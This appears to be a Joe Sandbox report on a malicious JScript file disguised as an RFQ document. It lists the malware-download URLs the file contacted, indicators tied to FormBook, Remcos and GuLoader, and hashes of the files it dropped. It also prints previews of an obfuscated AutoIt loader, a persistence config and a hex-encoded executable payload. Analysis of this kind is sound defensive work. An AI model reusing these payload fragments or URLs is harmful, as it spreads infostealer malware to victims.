https://www2.0zz0.com/O	wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2025/01/31/04/1957	wscript.exe, 00000000.00000003.2087875852.00000198182EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2025/01/31/04/672996792.jpge	wscript.exe, 00000000.00000003.2086324706.000001981919C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2025/01/31/04/195774460.jpg/E_/E8	wscript.exe, 00000000.00000003.2024121506.000001981832E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www2.0zz0.com/2025/01/31/04/672996792.jpg48578894	wscript.exe, 00000000.00000003.2024195004.00000198182BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025131758.00000198182F6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2025/01/31/04/195774460.jpg#	wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www2.0zz0.com/?	wscript.exe, 00000000.00000002.2088903608.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087277253.0000019816559000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085191683.0000019816559000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2025/01/31/04/195774460.jpgk	wscript.exe, 00000000.00000002.2089308318.0000019818FB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www2.0zz0.com/2Z%	wscript.exe, 00000000.00000002.2089113128.00000198182E8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088035837.00000198182E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2085383950.00000198182E6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	wscript.exe, 00000000.00000003.2087632945.0000019816805000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.112.1	www2.0zz0.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1615392
Start date and time:	2025-02-14 20:31:38 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	RFQ-PR 1-62557 & 38929 III.js
Detection:	MAL
Classification:	mal88.evad.winJS@4/4@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.112.1	LLLLLLLLASSSEERRRR.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	laserl.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/?iLy=Wfpx&y2IHp=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe6OYJ2CZYvza1X4jE5qPwznFDfci4lg==
	AGODA COMPANY PTE LTD.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/ftbq/?FZQ=issILDDGsHFYNfmqjTyaiRCxUP7MBLRR+fLjt4U/PjAATIgmLn5xJ6OEKWMTVCkC8eR6wGGZNe6kNExjC2H5xoO/guvwFBH7lbkJQqoMGH7yD90zbw==&_j=6nA47ZHp
	http://absoluteprintinequipment.com	Get hash	malicious	HTMLPhisher	Browse	absoluteprintinequipment.com/
	06OJsSI8WG.exe	Get hash	malicious	FormBook	Browse	www.newanthoperso.shop/b4b3/
	Solicitud de cotizacion.exe	Get hash	malicious	FormBook	Browse	www.sigaque.today/n61y/
	NOAH CRYPT.exe	Get hash	malicious	FormBook	Browse	www.clouser.store/0izs/
	X4pCdhjJCI.exe	Get hash	malicious	FormBook	Browse	www.buyspeechst.shop/ub3i/
	k2ax9F6u0c.exe	Get hash	malicious	FormBook	Browse	www.enoughmoney.online/nf1d/
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	touxzw.ir/jay/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www2.0zz0.com	_747031500 D747031500_A.html	Get hash	malicious	Remcos	Browse	104.21.96.1
	747031500_D747031500_A.js	Get hash	malicious	Remcos	Browse	104.21.80.1
	AdobeID.pdf.dll.dll	Get hash	malicious	Unknown	Browse	104.21.64.1
	g2Lvmzr7sU.dll	Get hash	malicious	FormBook	Browse	104.21.16.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	OC 23558 EINSA F2420.vbs	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://online.fliphtml5.com/dxwae/aonn/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	SecuriteInfo.com.Win32.Evo-gen.8914.22472.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	2025-02-14.js	Get hash	malicious	FormBook	Browse	172.67.207.50
	SecuriteInfo.com.Win32.Evo-gen.19176.14036.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	PO #86637.exe	Get hash	malicious	FormBook	Browse	104.21.80.1
	Intimacao758073849.lNK.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	IMG_1047_3026.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Ref#8520163.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Intimacao758073849.lNK.lnk	Get hash	malicious	Unknown	Browse	104.21.112.1
	Justificante67ab404ffe31b359e00a499e656454545.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
	BANK SLIP_TT COPY 2-13-2024_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	104.21.112.1
	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse	104.21.112.1
	INV-2025792 Payment_Summary Ref_4300.exe	Get hash	malicious	GuLoader	Browse	104.21.112.1
	Quote-370-UAE-24_pdf.exe	Get hash	malicious	Discord Token Stealer, GuLoader	Browse	104.21.112.1
	Commercial Offer PVT9864092001-2024_pdf.exe	Get hash	malicious	GuLoader	Browse	104.21.112.1
	blessed.ps1	Get hash	malicious	FormBook	Browse	104.21.112.1

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (1999), with CRLF line terminators
Category:	dropped
Size (bytes):	952476
Entropy (8bit):	6.624438059208196
Encrypted:	false
SSDEEP:	24576:me1jQGx0VG6eRY36fGG3W1YL3xAZFRzHwu:QYi36LqSu
MD5:	A224A99613680C9F62222278EABDCA6D
SHA1:	C54B0C5B214ECC82DDD029F4BAC298B117181813
SHA-256:	B9767D9336F63B5B92B31D1E6B9E1C1891A0C62828A80A789FB358B03DAF4B9D
SHA-512:	E1A0BAA62C119ABC5594B48F9441AEEA56E29D67E8C5350CF3B9EDBCDC5E9699157875F470F9AF17D8110BD441D6FC3CBAEDD96F11FF91FBBEBBAB11310E31F1
Malicious:	false
Reputation:	low
Preview:	#NoTrayIcon..Local $a, $b, $c, $d, $e.. _kAoMw()..For $d = 0 To 25.. If False Then.. DllCall('user32.dll', 'int', 'Beep', 'int', 334, 'int', 360).. EndIf..Next..$c = $d * 68..Local $str3 = "2L...kZH10i..1l.Zs.3o6..0...jKAP1BtP4Nj.aS..3...CORl.C.f..wfC.EXanxmAG3.C.yQ...P6.f.FMcWZC85.2..pU..c..HlC.f..D..KbhoR.yB9iylp..Hm.ip...u4.wH...b0A.kl.oC..Z0S..ab.ruvL1.E..d.B..ss.Z..d.Q.O.aE5vdb.LP.G.j.xbTm..GlVCC....qS.Ngf...L.8..l..X.qJlD4gu..w.56.e3q.2..Yv5O3.JD.3PT3a.hE.7.y..1ue29...T.Fd2.x.BToNjEvm...HhT.tL9XvR.Wu.4.g.M.0.Px.O.m..a.97a.p.Y7lC.g...lJz7Vm.iR.PLZT.MD.KXJ....GDhe.f..h...ORCCm.jhT....EC.qsSE.3S.yhk8E2S0..o...y.K.N..Dv7XSBh.HCh7.LH.U7zFt.WB

C:\Users\user\AppData\Local\Temp\aqgeukibkal\gnldmmsk.mp3

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (1999), with CRLF line terminators
Category:	dropped
Size (bytes):	952476
Entropy (8bit):	6.624438059208196
Encrypted:	false
SSDEEP:	24576:me1jQGx0VG6eRY36fGG3W1YL3xAZFRzHwu:QYi36LqSu
MD5:	A224A99613680C9F62222278EABDCA6D
SHA1:	C54B0C5B214ECC82DDD029F4BAC298B117181813
SHA-256:	B9767D9336F63B5B92B31D1E6B9E1C1891A0C62828A80A789FB358B03DAF4B9D
SHA-512:	E1A0BAA62C119ABC5594B48F9441AEEA56E29D67E8C5350CF3B9EDBCDC5E9699157875F470F9AF17D8110BD441D6FC3CBAEDD96F11FF91FBBEBBAB11310E31F1
Malicious:	true
Reputation:	low
Preview:	#NoTrayIcon..Local $a, $b, $c, $d, $e.. _kAoMw()..For $d = 0 To 25.. If False Then.. DllCall('user32.dll', 'int', 'Beep', 'int', 334, 'int', 360).. EndIf..Next..$c = $d * 68..Local $str3 = "2L...kZH10i..1l.Zs.3o6..0...jKAP1BtP4Nj.aS..3...CORl.C.f..wfC.EXanxmAG3.C.yQ...P6.f.FMcWZC85.2..pU..c..HlC.f..D..KbhoR.yB9iylp..Hm.ip...u4.wH...b0A.kl.oC..Z0S..ab.ruvL1.E..d.B..ss.Z..d.Q.O.aE5vdb.LP.G.j.xbTm..GlVCC....qS.Ngf...L.8..l..X.qJlD4gu..w.56.e3q.2..Yv5O3.JD.3PT3a.hE.7.y..1ue29...T.Fd2.x.BToNjEvm...HhT.tL9XvR.Wu.4.g.M.0.Px.O.m..a.97a.p.Y7lC.g...lJz7Vm.iR.PLZT.MD.KXJ....GDhe.f..h...ORCCm.jhT....EC.qsSE.3S.yhk8E2S0..o...y.K.N..Dv7XSBh.HCh7.LH.U7zFt.WB

C:\Users\user\AppData\Local\Temp\aqgeukibkal\ingobxndsgvxkm.bls

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	354
Entropy (8bit):	5.234302468618476
Encrypted:	false
SSDEEP:	6:AdRXSR5TXIVsp2aTZW0RGJRakjbloxsR5UVKtPWlMMXY+dkI16Go0fKqqBdURBVW:ORSd/RGSk/loqRQKtPWlMfYNo5qMdUzA
MD5:	417A44B0DF6E35FBB5E285FE911EEC78
SHA1:	0B5FAE78B6B2D74F850EC5577A6994729F5426AB
SHA-256:	0553D4090AC9A16B8CDA07B6FDEE219BF2792198DF756959EDF776805643AFED
SHA-512:	1D479CCD4D7527F1A2A89D428B8B52BD5C152C5E6C0ABC12696D48722A3C26C047F72A79B6DB516C076E4909B58E80D306C439F80B0CD467A003C12D9712AB8F
Malicious:	true
Reputation:	low
Preview:	[S3tt!ng].H-Hord=423034303941384431354341343743353335323330453846394431324530434345423133434632323941423433463543453841454135383031443738.KeIsX=winxew.Dir3ctory=dxad.RP=tbcj.onj.sK=281.sN=jogg.xdf.includ3r=fcwwefq.ipe.AuEx=gnldmmsk.mp3.ExE_c=shuv.xls.stpths=%appdata%.StartUps=vslxggsc-rC815f4y12B8otRQ2Z3P2Vv8GK6PMA8R9j.Key=WindowsUpdate.eof=ekqajjicwl.

C:\Users\user\AppData\Local\Temp\aqgeukibkal\tbcj.onj

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	899620
Entropy (8bit):	3.9604272042456734
Encrypted:	false
SSDEEP:	6144:B9yKFOVBM3AepCfFs0D9XbssaKQ1BTsSY4o1vrvRCHbN4UDq0YQ9pnFcJO9Afqkg:+KFrg/qS7R62bIE8zh/K2
MD5:	2592E063E493DB06B5F317468D432DD0
SHA1:	E43BDF7C426023CC1097A361863D10B7D4473B12
SHA-256:	383B7169E50E409C687447E8D774761A33524A888B0AC43288E76E3565A0C7FE
SHA-512:	D17BD302FE673C03DE980F696CC11AD1FD5653F4C72E0072C4B94B90EE699E397D298CF5BF48FD723CDD3A7E45BCB417071B3BD4208BCB01203D1E2C98640FEE
Malicious:	true
Preview:	0x4D59]]3]]]04]]]FFFF]]_8]]]]]]]4]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]80/]]0E/F_0E]_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D024]]]]]]]FC29_74_848D9F7_848D9F7_848D9F70CD428F7_48D9F70CD42F7/348D9F70CD42_F7648D9F7_/305DF7_948D9F726E8/EF7_48D9F7E20DCF68648D9F7E20DDF69948D9F7E20DF6248D9F7_/304F7/48D9F7_848D8F7F949D9F7/32/D0F6D_48D9F7/32/26F7_948D9F7/32/D_F6_948D9F752696368_848D9F7]]]]]]]]5045]]4C0/05]6/5D7C67]]]]]]]]E]]20/0_0/0E/]06205]]2]2]]]]]453D03]]/]]]08]5]]]4]]0/]]]]2]]05]0/]]]]]05]0/]]]]]]]08]]04]]]]]]02]]8]]0/]]0/]]]]0/]]0/]]]]]]0/]]]]]]]]]]]030F]6]040/]]]7]7]4448]]]]]]]]]]]]]]]]]]]C]7]9C3_]]20D506]38]]]]]]]]]]]]]]]]]]]F8D506]/8]]]58D506]4]]]]]]]]]]]]08]5]F404]]]]]]]]]]]]]]]]]]]]]]]]]]2E74657874]]]2D6/05]]/]]]06205]]04]]]]]]]]]]]]]]2]]0602E72646/746/]]/08_0/]]8]5]]8C0/]]6605]]]]]]]]]]]]]4]]0402E646/746/]]]945D]]]/]7]]0E]]]F206]]]]]]]]]]]]]4]]0C02E72737263]]]4448]]]7]7]]4]]]]07]]]]]]]]]]]]]4]]0402E72656C6F63]]9

Static File Info

General

File type:	ASCII text, with very long lines (955), with CRLF line terminators
Entropy (8bit):	4.596224136234382
TrID:
File name:	RFQ-PR 1-62557 & 38929 III.js
File size:	1'028'260 bytes
MD5:	335396680f20357d3ca2ffbe51f6e7a2
SHA1:	631e51f1cfd39c40c9987bee53ce25cb05b74b3a
SHA256:	93750a9917b952e019c6ed6faf8cf273cc730a6047b5ef65741c4d0c5c691278
SHA512:	b0da219aefb0de521b7bb4025e1e1ffab615c757fed3774e55368c08f7c0211e577782588c98aa82878274a4b76f089c05dbe85847295a711f4f4363d24ea6d3
SSDEEP:	6144:lR8RFRq5QRqjgikqIR9yKFOVBM3AepCfFs0D9XbssaKQ1BTsSY4o1vrvRCHbN4Uj:jmDq5KeguKFrg/qS7R62bIE8zh/KER
TLSH:	A025D7AE8B22C7937A30EA559240435B5C2EC4397554C7B136F34697E3CE90622BECED
File Content Preview:	..var v_YnMBOxL = 6936;..var v_WSdIX = 5040;..var v_BWAL = 2601;..var v_PHgnWA = 8384;..var v_OtinqsUu = 8162;..//WScript.Echo('uL4UclySSN');..if (v_BWAL > 41) {.. v_BWAL -= 10;..}..function v_UAcAVry() {.. return 264 * 62;..}..v_PHgnWA += 50;..if (

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2025 20:32:28.672307014 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:28.672357082 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:28.672445059 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:28.708278894 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:28.708303928 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.179486036 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.179766893 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.244204998 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.244230032 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.244719028 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.244791985 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.287130117 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.327352047 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415733099 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415787935 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415793896 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.415817022 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415836096 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.415869951 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.415885925 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415910959 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.415939093 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.415965080 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.478414059 CET	49704	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.478441000 CET	443	49704	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.490356922 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.490410089 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.490489006 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.490894079 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.490906954 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.966891050 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.967111111 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.967473984 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.967478991 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:29.967696905 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:29.967701912 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126750946 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126806021 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126817942 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126827955 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126846075 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126873970 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126898050 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126907110 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126921892 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126939058 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126944065 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.126981974 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.126986980 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.127018929 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.127022982 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.127058029 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.127378941 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.127424002 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.127429008 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.127470016 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.131544113 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.131603003 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.131611109 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.131648064 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.131653070 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.131689072 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217192888 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217444897 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217473030 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217480898 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217489004 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217528105 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217531919 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217566967 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217679024 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217714071 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217726946 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217767000 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217775106 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217812061 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.217817068 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.217852116 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218436956 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218476057 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218487024 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218525887 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218532085 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218564987 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218574047 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218611956 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218616009 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218650103 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.218656063 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.218688965 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.219238043 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.219279051 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.219289064 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.219331026 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.219340086 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.219374895 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.219379902 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.219413042 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.219423056 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.219459057 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.220129013 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.220175028 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.220181942 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.220216036 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.220221043 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.220257998 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.220263004 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.220299006 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.220303059 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.220336914 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.222059965 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.222106934 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317394018 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317461014 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317465067 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317481041 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317497969 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317544937 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317547083 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317564011 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317595005 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317619085 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317619085 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317631006 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317662954 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317672014 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317684889 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317692995 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317704916 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317714930 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317730904 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317739010 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317750931 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317778111 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317830086 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317877054 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317878008 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317890882 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.317913055 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.317929029 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.318017960 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.318064928 CET	49705	443	192.168.2.5	104.21.112.1
Feb 14, 2025 20:32:30.318064928 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.318077087 CET	443	49705	104.21.112.1	192.168.2.5
Feb 14, 2025 20:32:30.318099976 CET	49705	443	192.168.2.5	104.21.112.1
